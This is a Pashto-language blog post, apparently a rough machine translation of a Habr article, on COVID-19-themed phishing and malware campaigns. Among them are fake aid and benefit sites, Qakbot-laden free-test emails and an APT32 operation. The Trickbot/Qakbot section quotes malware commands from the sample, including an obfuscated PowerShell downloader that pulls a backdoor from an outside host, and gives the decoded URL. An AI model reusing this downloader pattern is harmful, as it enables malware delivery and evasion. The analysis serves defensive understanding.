د کورونویرس سایبر بریدونه: ټول ټکی په ټولنیز انجینرۍ کې دی

برید کونکي د COVID-19 موضوع څخه ګټه پورته کولو ته دوام ورکوي ، د کاروونکو لپاره ډیر او ډیر ګواښونه رامینځته کوي څوک چې د ناروغۍ پورې اړوند هرڅه ته لیواله دي. IN وروستی پوسټ موږ دمخه د دې په اړه خبرې کړې چې کوم ډول مالویر د کورونویرس په پایله کې څرګند شوي ، او نن به موږ د ټولنیز انجینرۍ تخنیکونو په اړه وغږیږو چې د روسیې په ګډون په بیلابیلو هیوادونو کې کاروونکي لا دمخه ورسره مخ شوي. عمومي رجحانات او مثالونه د کټ لاندې دي.

په یاد ولرئ تیر وخت موږ د دې حقیقت په اړه خبرې وکړې چې خلک نه یوازې د کورونویرس او د ناروغۍ کورس په اړه لوستلو ته چمتو دي ، بلکه د مالي ملاتړ اقداماتو په اړه هم؟ دلته یو ښه مثال دی. د آلمان په شمالي راین ویسټفالیا یا NRW ایالت کې په زړه پورې فشینګ برید کشف شو. برید کوونکو د اقتصاد وزارت د ویب پاڼې کاپي جوړه کړېد NRW د اقتصادي چارو وزارت)، چیرته چې هرڅوک کولی شي د مالي مرستې لپاره غوښتنه وکړي. دا ډول برنامه واقعیا شتون لري ، او دا د سکیمرانو لپاره ګټور ثابت شو. د قربانیانو د شخصي معلوماتو په ترلاسه کولو سره، دوی د اصلي وزارت په ویب پاڼه کې یو غوښتنلیک جوړ کړ، مګر د بانک نور توضیحات یې په ګوته کړل. د رسمي معلوماتو له مخې، تر دې مهاله چې دغه سکیم کشف شوی، څلور زره جعلي غوښتنې شوې دي. د پایلې په توګه، د اغیزمنو اتباعو لپاره 4 ملیون ډالر د درغلیو لاسونو ته ورسیدل.

ایا تاسو د COVID-19 لپاره وړیا ازموینه غواړئ؟

د کورونویرس تیم لرونکي فشینګ بله د پام وړ بیلګه وه کشف شوی په بریښنالیکونو کې. پیغامونو د کاروونکو پام د دې وړاندیز سره راجلب کړ چې د کورونویرس انفیکشن لپاره وړیا ازموینې ترسره کړي. د دې ضمیمه کې لیکونه د Trickbot/Qakbot/Qbot مثالونه وو. او کله چې هغه څوک چې غواړي د دوی روغتیا معاینه کړي "د ضمیمه شوي فورمه ډکولو" پیل وکړ، کمپیوټر ته یو ناوړه سکریپټ ډاونلوډ شو. او د سینڈ باکسینګ ازموینې څخه مخنیوي لپاره ، سکریپټ یوازې یو څه وروسته د اصلي ویروس ډاونلوډ پیل کړ ، کله چې د محافظت سیسټمونه قانع شول چې هیڅ ناوړه فعالیت به پیښ نشي.

د میکرو فعالولو لپاره د ډیری کاروونکو قانع کول هم اسانه وو. د دې کولو لپاره، یو معیاري چل کارول شوی و: د پوښتنلیک ډکولو لپاره، تاسو لومړی د میکرو فعالولو ته اړتیا لرئ، پدې معنی چې تاسو د VBA سکریپټ چلولو ته اړتیا لرئ.

لکه څنګه چې تاسو لیدلی شئ، د VBA سکریپټ په ځانګړې توګه د انټي ویروسونو څخه ماسک شوی.

وینډوز د انتظار ځانګړتیا لري چیرې چې غوښتنلیک د ډیفالټ "هو" ځواب منلو دمخه /T <ثانوي> انتظار کوي. زموږ په قضیه کې ، سکریپټ د لنډمهاله فایلونو حذف کولو دمخه 65 ثانیې انتظار وکړ:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

او د انتظار په وخت کې، مالویر ډاونلوډ شوی و. د دې لپاره یو ځانګړی پاور شیل سکریپټ په لاره اچول شوی و:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

د Base64 ارزښت د کوډ کولو وروسته، د پاور شیل سکریپټ د آلمان څخه د مخکینۍ هیک شوي ویب سرور کې د شا دروازه ډاونلوډ کوي:

http://automatischer-staubsauger.com/feature/777777.png

او د نوم لاندې یې خوندي کوي:

C:UsersPublictmpdirfile1.exe

پوښۍ ‘C:UsersPublictmpdir’ ړنګیږي کله چې د 'tmps1.bat' فایل چلول چې کمانډ لري cmd /c mkdir ""C:UsersPublictmpdir"".

پر دولتي ادارو هدفي بریدونه

سربیره پردې ، د FireEye شنونکو پدې وروستیو کې د APT32 هدف شوي برید راپور ورکړی چې هدف یې په ووهان کې حکومتي جوړښتونه او همدارنګه د چین د بیړني مدیریت وزارت. د ویشل شوي RTFs څخه یو د نیویارک ټایمز مقالې ته یو لینک درلود چې عنوان یې دی د کوروناویرس ژوندی تازه معلومات: چین د هوبي څخه مسافرین تعقیبوي. په هرصورت، د دې په لوستلو سره، مالویر ډاونلوډ شوی و (د FireEye شنونکو مثال د METALJACK په توګه پیژندلی).

په زړه پورې خبره دا ده چې د کشف په وخت کې ، هیڅ یو انټي ویروس دا مثال ندی موندلی ، د ویروسټوټال په وینا.

کله چې رسمي ویب پاڼې ښکته وي

د فشینګ برید ترټولو زړه راښکونکی مثال تیره ورځ په روسیه کې پیښ شو. د دې دلیل د 3 څخه تر 16 کلونو پورې د ماشومانو لپاره د اوږدې مودې انتظار شوي ګټې ټاکل و. کله چې د 12 کال د می په 2020 نیټه د غوښتنلیکونو منلو پیل اعلان شو ، ملیونونه د اوږدې مودې انتظار شوي مرستې لپاره د دولتي خدماتو ویب پا toې ته ورغلل او پورټل یې د مسلکي DDoS برید څخه بدتر لاندې راوست. کله چې ولسمشر وویل چې "دولتي خدمات نشي کولی د غوښتنلیکونو جریان سره مقابله وکړي ،" خلکو د غوښتنلیکونو منلو لپاره د بدیل سایټ پیل کولو په اړه آنلاین خبرې پیل کړې.

ستونزه دا ده چې ډیری سایټونو په یوځل کار پیل کړی، او په داسې حال کې چې یو یې، په posobie16.gosuslugi.ru کې ریښتیا، په حقیقت کې غوښتنلیکونه مني، نور لسګونه د غلط کاروونکو شخصي معلومات راټولوي.

د SearchInform همکارانو په .ru زون کې شاوخوا 30 نوي جعلي ډومینونه وموندل. Infosecurity and Softline شرکت د اپریل له پیل راهیسې له 70 څخه ډیر ورته جعلي دولتي خدماتو ویب پاڼې تعقیب کړي. د دوی جوړونکي پیژندل شوي سمبولونه سمبالوي او د ګوسسلګی، ګوسسلګی - 16، ویپلاتی، کوویډ-ویپلاتی، پوسوبی او داسې نورو کلمو ترکیبونه هم کاروي.

هایپ او ټولنیز انجینري

دا ټول مثالونه یوازې تاییدوي چې برید کونکي په بریالیتوب سره د کورونویرس موضوع منیټ کوي. او هرڅومره چې ټولنیز تاوتریخوالی او ناڅرګندې مسلې لوړې وي ، د سکیمرانو ډیر چانسونه باید مهم معلومات غلا کړي ، خلک دې ته اړ کړي چې خپلې پیسې پخپله پریږدي ، یا په ساده ډول ډیر کمپیوټرونه هیک کړي.

او دې ته په پام سره چې د وبا ناروغي احتمالي چمتو شوي خلک دې ته اړ کړي چې له کور څخه په ډله ایز ډول کار وکړي ، نه یوازې شخصي ، بلکې کارپوریټ ډیټا هم له خطر سره مخ دي. د مثال په توګه، پدې وروستیو کې د مایکروسافټ 365 (پخوانی دفتر 365) کارونکي هم د فشینګ برید سره مخ شوي. خلکو د لیکونو د ضمیمې په توګه لوی "یاد شوي" غږیز پیغامونه ترلاسه کړل. په هرصورت، فایلونه په حقیقت کې یو HTML پاڼه وه چې د برید قربانیان یې لیږلي جعلي مایکروسافټ 365 لاسلیک پاڼه. د پایلې په توګه، د حساب څخه د ټولو معلوماتو د لاسرسي له لاسه ورکول او جوړجاړی.

سرچینه: www.habr.com